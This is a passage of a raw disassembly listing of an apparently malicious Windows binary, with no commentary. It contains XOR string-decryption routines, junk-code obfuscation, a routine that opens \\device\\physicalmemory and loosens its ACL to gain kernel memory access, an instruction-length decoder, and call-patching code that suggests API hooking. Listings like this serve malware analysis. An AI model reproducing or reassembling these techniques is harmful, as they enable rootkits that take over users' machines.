mov [ebp+var_10], eax
call sub_40C2B4 ; IsDebuggerPresent
push 0
cmp [ebp+arg_4], 0
jz short loc_401B85
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
jmp short loc_401B8B
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: sub_401AC1+BA�j
lea eax, [ebp+var_14]
mov [ebp+var_18], eax
loc_401B8B: ; CODE XREF: sub_401AC1+C2�j
push [ebp+var_18]
push [ebp+var_C]
push [ebp+var_10]
push ebx
call sub_40C308 ; ReadFile
call sub_40C1F4 ; GetProcessHeap
push ebx
call sub_40C1DC ; CloseHandle
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, [ebp+var_10]
loc_401BAD: ; CODE XREF: sub_401AC1+7D�j
pop edi
pop esi
pop ebx
leave
retn
sub_401AC1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2C0
lea eax, ds:410770h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-8], 8Ah
xor edi, edi
jmp short loc_401C02
; ---------------------------------------------------------------------------
loc_401BE8: ; CODE XREF: .text:00401C04�j
mov eax, dword_43B2C0
add eax, edi
lea eax, ds:410770h[eax]
movsx edx, byte ptr [eax]
xor edx, 0CCh
mov [eax], dl
inc edi
loc_401C02: ; CODE XREF: .text:00401BE6�j
cmp edi, esi
jl short loc_401BE8
mov eax, dword_43B2C0
add eax, esi
mov byte ptr ds:dword_410770[eax], 0
xor edi, edi
mov edi, dword_43B2C0
add dword_43B2C0, 2
mov eax, dword_43B2C0
lea eax, [eax+esi+4]
mov dword_43B2C0, eax
add dword_43B2C0, 3
cmp dword_43B2C0, 0DCEh
jle short loc_401C4C
and dword_43B2C0, 0
loc_401C4C: ; CODE XREF: .text:00401C43�j
mov dword ptr [ebp-0Ch], 20Ah
lea eax, dword_410770[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C5D proc near ; CODE XREF: sub_4056EE+691�p
; sub_4096E4+C64�p
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_4], 76DDh
movzx eax, [ebp+var_4]
imul eax, 58BEh
mov [ebp+var_4], ax
mov [ebp+var_1], 0F1h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
mov ebx, [ebp+arg_4]
jmp short loc_401CD6
; ---------------------------------------------------------------------------
loc_401C90: ; CODE XREF: sub_401C5D+80�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0Dh
jnz short loc_401CD5
lea edi, [ebp+var_9]
lea esi, aA__0 ; "<A*_"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
mov edx, ebx
sub edx, eax
push edx
mov edx, [ebp+arg_0]
add edx, eax
push edx
push [ebp+arg_8]
call sub_40C674
add esp, 0Ch
mov eax, ebx
sub eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
mov byte ptr [edx+eax], 0
mov eax, ebx
add eax, 2
jmp short loc_401D44
; ---------------------------------------------------------------------------
loc_401CD5: ; CODE XREF: sub_401C5D+3A�j
inc ebx
loc_401CD6: ; CODE XREF: sub_401C5D+31�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401C90
cmp [ebp+arg_4], 0
jz short loc_401D0B
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401D0B
mov eax, ebx
dec eax
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0Ah
jnz short loc_401D0B
call sub_40C224 ; GetVersion
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
inc eax
jmp short loc_401D44
; ---------------------------------------------------------------------------
loc_401D0B: ; CODE XREF: sub_401C5D+86�j
; sub_401C5D+8F�j ...
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_40C3BC ; lstrlenA
mov ebx, eax
or ebx, ebx
jz short loc_401D42
mov [ebp+var_8], 0B3Ch
inc [ebp+var_8]
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
push [ebp+arg_8]
call sub_40C138
call sub_40C1F4 ; GetProcessHeap
mov eax, [ebp+arg_4]
add eax, ebx
jmp short loc_401D44
; ---------------------------------------------------------------------------
loc_401D42: ; CODE XREF: sub_401C5D+BE�j
xor eax, eax
loc_401D44: ; CODE XREF: sub_401C5D+76�j
; sub_401C5D+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401C5D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 0CEh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2D4
lea eax, ds:4361E0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-8], 23Dh
xor edi, edi
jmp short loc_401D99
; ---------------------------------------------------------------------------
loc_401D7F: ; CODE XREF: .text:00401D9B�j
mov eax, dword_43B2D4
add eax, edi
lea eax, ds:4361E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E9h
mov [eax], dl
inc edi
loc_401D99: ; CODE XREF: .text:00401D7D�j
cmp edi, esi
jl short loc_401D7F
mov dword ptr [ebp-0Ch], 205h
mov eax, dword_43B2D4
add eax, esi
mov byte ptr ds:dword_4361E0[eax], 0
xor edi, edi
mov edi, dword_43B2D4
add dword_43B2D4, 2
mov eax, dword_43B2D4
lea eax, [eax+esi+1]
mov dword_43B2D4, eax
cmp eax, 0DD5h
jle short loc_401DDE
and dword_43B2D4, 0
loc_401DDE: ; CODE XREF: .text:00401DD5�j
lea eax, dword_4361E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401DE8 proc near ; CODE XREF: sub_402936+74�p
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_2], 6420h
inc [ebp+var_2]
inc dword_43B228
call sub_40C1F4 ; GetProcessHeap
mov ebx, [ebp+arg_0]
and ds:dword_40DFC0, 0
and ds:dword_41D914, 0
and ds:dword_41D92C, 0
and ds:dword_40F1DC, 0
mov ds:dword_41A6B0, 4
mov ds:dword_413CAC, 4
loc_401E39: ; CODE XREF: sub_401DE8+122�j
; sub_401DE8+143�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_413CA8, al
movzx eax, ds:byte_413CA8
or eax, eax
jl loc_4020B1
cmp eax, 0FFh
jg loc_4020B1
jmp off_43B2E4[eax*4]
; ---------------------------------------------------------------------------
call sub_40C188 ; GetCurrentProcessId
loc_401E69: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
or byte ptr ds:dword_41D914, 40h
jmp loc_4020B1
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401E7B: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_10], eax
add ds:dword_41D92C, eax
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401E96: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
or byte ptr ds:dword_41D914, 40h
test byte ptr [ebx], 38h
jnz loc_4020B1
lea edi, [ebp+var_9]
lea esi, byte_43B2D8
xor ecx, ecx
inc ecx
rep movsb
loc_401EB4: ; CODE XREF: sub_401DE8+75�j
; DATA XREF: .data:0043B2F4�o ...
test ds:byte_413CA8, 1
jz short loc_401ECD
mov eax, ds:dword_41A6B0
add ds:dword_41D92C, eax
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401ECD: ; CODE XREF: sub_401DE8+D3�j
inc ds:dword_41D92C
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401ED8: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
inc ds:dword_41D92C
jmp loc_4020B1
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401EE9: ; CODE XREF: sub_401DE8+75�j
; DATA XREF: .data:0043B37C�o ...
test byte ptr ds:dword_41D914, 10h
jz short loc_401EF9
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_401EF9: ; CODE XREF: sub_401DE8+108�j
or byte ptr ds:dword_41D914, 10h
mov al, ds:byte_413CA8
mov ds:byte_40F1E8, al
jmp loc_401E39
; ---------------------------------------------------------------------------
loc_401F0F: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
test byte ptr ds:dword_41D914, 4
jz short loc_401F1F
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_401F1F: ; CODE XREF: sub_401DE8+12E�j
call sub_40C194 ; GetCurrentThreadId
or byte ptr ds:dword_41D914, 4
jmp loc_401E39
; ---------------------------------------------------------------------------
loc_401F30: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
test byte ptr ds:dword_41D914, 8
jz short loc_401F40
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_401F40: ; CODE XREF: sub_401DE8+14F�j
call sub_40C188 ; GetCurrentProcessId
or byte ptr ds:dword_41D914, 8
mov al, ds:byte_413CA8
mov ds:byte_41EBD0, al
jmp loc_401E39
; ---------------------------------------------------------------------------
loc_401F5B: ; CODE XREF: sub_401DE8+75�j
; DATA XREF: .data:0043B47C�o
test byte ptr ds:dword_41D914, 1
jz short loc_401F6B
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_401F6B: ; CODE XREF: sub_401DE8+17A�j
call sub_40C1F4 ; GetProcessHeap
or byte ptr ds:dword_41D914, 1
mov ds:dword_41A6B0, 2
jmp loc_401E39
; ---------------------------------------------------------------------------
loc_401F86: ; CODE XREF: sub_401DE8+75�j
; DATA XREF: .data:0043B480�o
test byte ptr ds:dword_41D914, 2
jz short loc_401F96
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_401F96: ; CODE XREF: sub_401DE8+1A5�j
or byte ptr ds:dword_41D914, 2
mov ds:dword_413CAC, 2
jmp loc_401E39
; ---------------------------------------------------------------------------
inc dword_43B228
loc_401FB2: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
inc ds:dword_41D92C
or byte ptr ds:dword_41D914, 40h
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401FC4: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
mov eax, ds:dword_41A6B0
add ds:dword_41D92C, eax
or byte ptr ds:dword_41D914, 40h
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401FDB: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
mov eax, ds:dword_41A6B0
add eax, 2
add ds:dword_41D92C, eax
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401FEE: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
mov eax, ds:dword_413CAC
add ds:dword_40F1DC, eax
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_401FFE: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
mov eax, ds:dword_41A6B0
add ds:dword_41D92C, eax
jmp loc_4020B1
; ---------------------------------------------------------------------------
inc dword_43B228
loc_402014: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
add ds:dword_41D92C, 2
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_402020: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
add ds:dword_41D92C, 3
jmp loc_4020B1
; ---------------------------------------------------------------------------
loc_40202C: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+281�j
; DATA XREF: ...
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_402033: ; CODE XREF: sub_401DE8+75�j
; DATA XREF: .data:0043B320�o
or byte ptr ds:dword_41D914, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42EBE0, al
movzx eax, ds:byte_42EBE0
or eax, eax
jl short loc_4020AA
cmp eax, 0Bh
jg short loc_40205B
jmp off_43B6E4[eax*4]
; ---------------------------------------------------------------------------
loc_40205B: ; CODE XREF: sub_401DE8+26A�j
cmp eax, 80h
jl short loc_4020AA
cmp eax, 0CFh
jg short loc_4020AA
jmp off_43B514[eax*4]
; ---------------------------------------------------------------------------
call sub_40C2B4 ; IsDebuggerPresent
loc_402075: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+26C�j ...
or byte ptr ds:dword_41D914, 40h
mov [ebp+var_15], 57h
add [ebp+var_15], 11h
jmp short loc_4020B1
; ---------------------------------------------------------------------------
inc dword_43B228
jmp short loc_4020B1
; ---------------------------------------------------------------------------
loc_40208E: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+26C�j ...
mov eax, ds:dword_41A6B0
add ds:dword_41D92C, eax
jmp short loc_4020B1
; ---------------------------------------------------------------------------
loc_40209B: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+26C�j ...
inc ds:dword_41D92C
or byte ptr ds:dword_41D914, 40h
jmp short loc_4020B1
; ---------------------------------------------------------------------------
loc_4020AA: ; CODE XREF: sub_401DE8+75�j
; sub_401DE8+265�j ...
xor eax, eax
jmp loc_402246
; ---------------------------------------------------------------------------
loc_4020B1: ; CODE XREF: sub_401DE8+64�j
; sub_401DE8+6F�j ...
inc dword_43B228
test byte ptr ds:dword_41D914, 40h
jz loc_4021CA
mov eax, dword_43B2D9
mov [ebp+var_10+2], eax
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_42FD00, al
call sub_40C1B8 ; RtlGetLastWin32Error
movzx eax, ds:byte_42FD00
and eax, 0C0h
mov [ebp+var_9], al
movzx eax, ds:byte_42FD00
and eax, 7
mov [ebp+var_A], al
movzx eax, [ebp+var_9]
cmp eax, 0C0h
jz loc_4021CA
call sub_40C1B8 ; RtlGetLastWin32Error
cmp [ebp+var_9], 40h
jnz short loc_402117
inc ds:dword_40F1DC
loc_402117: ; CODE XREF: sub_401DE8+327�j
call sub_40C188 ; GetCurrentProcessId
movzx eax, [ebp+var_9]
cmp eax, 80h
jnz short loc_402132
mov eax, ds:dword_413CAC
add ds:dword_40F1DC, eax
loc_402132: ; CODE XREF: sub_401DE8+33D�j
call sub_40C224 ; GetVersion
cmp ds:dword_413CAC, 2
jnz short loc_40215F
mov [ebp+var_14], 233Fh
inc [ebp+var_14]
cmp [ebp+var_9], 0
jnz short loc_4021CA
cmp [ebp+var_A], 6
jnz short loc_4021CA
add ds:dword_40F1DC, 2
jmp short loc_4021CA
; ---------------------------------------------------------------------------
loc_40215F: ; CODE XREF: sub_401DE8+356�j
call sub_40C218 ; GetTickCount
cmp [ebp+var_A], 4
jnz short loc_4021A6
lea edi, [ebp+var_10]
lea esi, byte_43B2DD
xor ecx, ecx
inc ecx
rep movsb
or byte ptr ds:dword_41D914, 80h
lea edi, [ebp+var_14+1]
lea esi, word_43B2DE
mov ecx, 3
rep movsb
mov eax, ebx
inc ebx
mov al, [eax]
mov ds:byte_41A6AC, al
movzx eax, ds:byte_41A6AC
and eax, 7
mov [ebp+var_A], al
loc_4021A6: ; CODE XREF: sub_401DE8+380�j
cmp [ebp+var_A], 5
jnz short loc_4021B9
cmp [ebp+var_9], 0
jnz short loc_4021B9
add ds:dword_40F1DC, 4
loc_4021B9: ; CODE XREF: sub_401DE8+3C2�j
; sub_401DE8+3C8�j
mov byte ptr [ebp+var_10+1], 7
movzx eax, byte ptr [ebp+var_10+1]
imul eax, 1630h
mov byte ptr [ebp+var_10+1], al
loc_4021CA: ; CODE XREF: sub_401DE8+2D6�j
; sub_401DE8+318�j ...
and ds:dword_40F1E0, 0
jmp short loc_4021EB
; ---------------------------------------------------------------------------
loc_4021D3: ; CODE XREF: sub_401DE8+40E�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F1E0
mov al, [eax]
mov ds:byte_413CA0[edx], al
inc ds:dword_40F1E0
loc_4021EB: ; CODE XREF: sub_401DE8+3E9�j
mov eax, ds:dword_40F1DC
cmp ds:dword_40F1E0, eax
jb short loc_4021D3
mov [ebp+var_3], 28h
add [ebp+var_3], 1
and ds:dword_40F1E0, 0
jmp short loc_402221
; ---------------------------------------------------------------------------
loc_402209: ; CODE XREF: sub_401DE8+444�j
mov eax, ebx
inc ebx
mov edx, ds:dword_40F1E0
mov al, [eax]
mov ds:byte_439380[edx], al
inc ds:dword_40F1E0
loc_402221: ; CODE XREF: sub_401DE8+41F�j
mov eax, ds:dword_41D92C
cmp ds:dword_40F1E0, eax
jb short loc_402209
call sub_40C2B4 ; IsDebuggerPresent
inc dword_43B228
mov eax, ebx
sub eax, [ebp+arg_0]
mov ds:dword_40DFC0, eax
xor eax, eax
inc eax
loc_402246: ; CODE XREF: sub_401DE8+10C�j
; sub_401DE8+132�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401DE8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43BF4C
lea eax, ds:417390h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_402287
; ---------------------------------------------------------------------------
loc_402270: ; CODE XREF: .text:00402289�j
mov eax, dword_43BF4C
add eax, edi
lea eax, ds:417390h[eax]
movsx edx, byte ptr [eax]
xor edx, 8
mov [eax], dl
inc edi
loc_402287: ; CODE XREF: .text:0040226E�j
cmp edi, esi
jl short loc_402270
mov eax, dword_43BF4C
add eax, esi
mov byte ptr ds:dword_417390[eax], 0
xor edi, edi
mov edi, dword_43BF4C
mov eax, edi
add eax, 6
add eax, esi
mov dword_43BF4C, eax
inc dword_43BF4C
cmp dword_43BF4C, 0DEBh
jle short loc_4022C7
and dword_43BF4C, 0
loc_4022C7: ; CODE XREF: .text:004022BE�j
lea eax, dword_417390[edi]
pop edi
pop esi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022D1 proc near ; CODE XREF: sub_402B12+15�p
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C1B8 ; RtlGetLastWin32Error
push offset aNtdll_dll ; "ntdll.dll"
call sub_40C1D0 ; GetModuleHandleA
mov edi, eax
call sub_40C1B8 ; RtlGetLastWin32Error
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push edi
call sub_40C1E8 ; GetProcAddress
mov ds:dword_42FCF8, eax
call sub_40C2B4 ; IsDebuggerPresent
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push edi
call sub_40C1E8 ; GetProcAddress
mov ds:dword_41C848, eax
push offset aNtopensection ; "NtOpenSection"
push edi
call sub_40C1E8 ; GetProcAddress
mov ds:dword_41A6B8, eax
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push edi
call sub_40C1E8 ; GetProcAddress
mov ds:dword_41D924, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push edi
call sub_40C1E8 ; GetProcAddress
mov ds:dword_42FCF4, eax
mov [ebp+var_1], 8Fh
movzx eax, [ebp+var_1]
imul eax, 3981h
mov [ebp+var_1], al
pop edi
leave
retn
sub_4022D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402355 proc near ; CODE XREF: sub_402B12+158�p
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_72 = word ptr -72h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_59 = byte ptr -59h
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 7Ch
push ebx
push esi
push edi
mov [ebp+var_54], 710Ch
sub [ebp+var_54], 1F1Fh
mov ax, word_43BFFA
mov [ebp+var_72], ax
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_68]
push eax
call ds:dword_42FCF8
call sub_40C1F4 ; GetProcessHeap
mov [ebp+var_18], 18h
and [ebp+var_14], 0
mov [ebp+var_58], 1546h
inc [ebp+var_58]
lea eax, [ebp+var_68]
mov [ebp+var_10], eax
call sub_40C218 ; DATA XREF: sub_43F411+2F�o
mov [ebp+var_C], 40h
call sub_40C188 ; GetCurrentProcessId
and [ebp+var_8], 0
mov [ebp+var_59], 1Ch
add [ebp+var_59], 1
and [ebp+var_4], 0
mov [ebp+var_5C], 3052h
inc [ebp+var_5C]
and [ebp+var_30], 0
call sub_40C224 ; GetVersion
and [ebp+var_2C], 0
mov ebx, 3259h
mov eax, 2A8Fh
mul ebx
mov [ebp+var_7C], eax
mov ebx, eax
mov [ebp+var_28], 1
mov ebx, 0DEEh
mov eax, ebx
add eax, ebx
mov ebx, eax
mov [ebp+var_24], 1
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
mov [ebp+var_50], 2
call sub_40C224 ; GetVersion
mov [ebp+var_4C], 1
mov ebx, 6B52h
add ebx, 702Ah
and [ebp+var_48], 0
call sub_40C224 ; GetVersion
lea edi, [ebp+var_44]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
mov [ebp+var_52], 3C8Bh
movzx eax, [ebp+var_52]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52], ax
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+var_1C]
push eax
call ds:dword_41A6B8
lea eax, [ebp+var_78]
push eax
push 0
lea eax, [ebp+var_6C]
push eax
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C5D8 ; GetSecurityInfo
mov [ebp+var_5E], 4CDAh
movzx eax, [ebp+var_5E]
imul eax, 5882h
mov [ebp+var_5E], ax
lea eax, [ebp+var_70]
push eax
push [ebp+var_6C]
lea eax, [ebp+var_50]
push eax
mov eax, 10h
sub eax, dword_43BF48
push eax
call sub_40C5F0 ; SetEntriesInAclA
call sub_40C188 ; GetCurrentProcessId
push 0
push [ebp+var_70]
push 0
push 0
push 4
push 6
push [ebp+var_1C]
call sub_40C5E4 ; SetSecurityInfo
push [ebp+var_1C]
call sub_40C1DC ; CloseHandle
call sub_40C224 ; GetVersion
lea eax, [ebp+var_18]
push eax
push [ebp+var_50]
lea eax, [ebp+var_1C]
push eax
call ds:dword_41A6B8
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
leave
retn
sub_402355 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_402B12+228�p
var_1E = byte ptr -1Eh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
push edi
mov [ebp+var_4], 10C8h
mov eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov [ebp+var_4], edx
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov ecx, [ebp+arg_8]
mov [ebp+var_8], ecx
and [ebp+var_C], 0
xor edx, edx
mov [ebp+var_14], edx
mov [ebp+var_18], eax
lea edi, [ebp+var_1E]
lea esi, aZ9daw ; "z9Daw"
mov ecx, 3
rep movsw
push 4
push 0
push 1
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
push 0
lea eax, [ebp+var_C]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41D924
call sub_40C218 ; GetTickCount
mov eax, [ebp+var_C]
pop edi
pop esi
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402563 proc near ; CODE XREF: sub_402B12+334�p
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_1], 0F7h
add [ebp+var_1], 0EBh
push [ebp+arg_0]
push 0FFFFFFFFh
call ds:dword_41C848
mov [ebp+var_4], 5462h
movzx eax, [ebp+var_4]
imul eax, 2138h
mov [ebp+var_4], ax
leave
retn
sub_402563 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 379h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C00C
lea eax, ds:412C90h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_4025D6
; ---------------------------------------------------------------------------
loc_4025BF: ; CODE XREF: .text:004025D8�j
mov eax, dword_43C00C
add eax, edi
lea eax, ds:412C90h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Bh
mov [eax], dl
inc edi
loc_4025D6: ; CODE XREF: .text:004025BD�j
cmp edi, esi
jl short loc_4025BF
mov dword ptr [ebp-8], 33Dh
mov eax, dword_43C00C
add eax, esi
mov byte ptr ds:dword_412C90[eax], 0
xor edi, edi
mov edi, dword_43C00C
add dword_43C00C, 2
mov eax, dword_43C00C
add eax, 2
add eax, esi
mov dword_43C00C, eax
add dword_43C00C, 3
cmp dword_43C00C, 0DB3h
jle short loc_402628
and dword_43C00C, 0
loc_402628: ; CODE XREF: .text:0040261F�j
mov dword ptr [ebp-0Ch], 65h
lea eax, dword_412C90[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402639 proc near ; CODE XREF: sub_402936+1C1�p
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = word ptr -0Ch
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
call sub_40C188 ; GetCurrentProcessId
lea edi, [ebp+var_8]
lea esi, dword_43C104
movsd
movsd
xor ebx, ebx
loc_402654: ; CODE XREF: sub_402639+2F2�j
call sub_40C224 ; GetVersion
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_40269F
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_40269F
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_40269F
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_40269F
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_402931
loc_40269F: ; CODE XREF: sub_402639+2D�j
; sub_402639+3A�j ...
call sub_40C1F4 ; GetProcessHeap
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
call sub_40C1B8 ; RtlGetLastWin32Error
mov [ebp+var_9], 0
loc_4026C0: ; CODE XREF: sub_402639+178�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_9]
imul edx, 0Ch
movzx edx, byte_43C098[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_402797
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_402797
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_402797
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_402797
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz short loc_402797
mov [ebp+var_A], 0E0h
add [ebp+var_A], 1
movzx eax, [ebp+var_9]
imul eax, 0Ch
push off_43C0A0[eax]
call sub_40C1D0 ; GetModuleHandleA
movzx edi, [ebp+var_9]
imul edi, 0Ch
push off_43C09C[edi]
push eax
call sub_40C1E8 ; GetProcAddress
mov [ebp+var_10], eax
call sub_40C2B4 ; IsDebuggerPresent
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_10]
sub eax, 4
mov [ebp+var_14], eax
mov ax, word_43C10C
mov [ebp+var_16], ax
mov eax, [ebp+arg_4]
mov edx, ecx
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
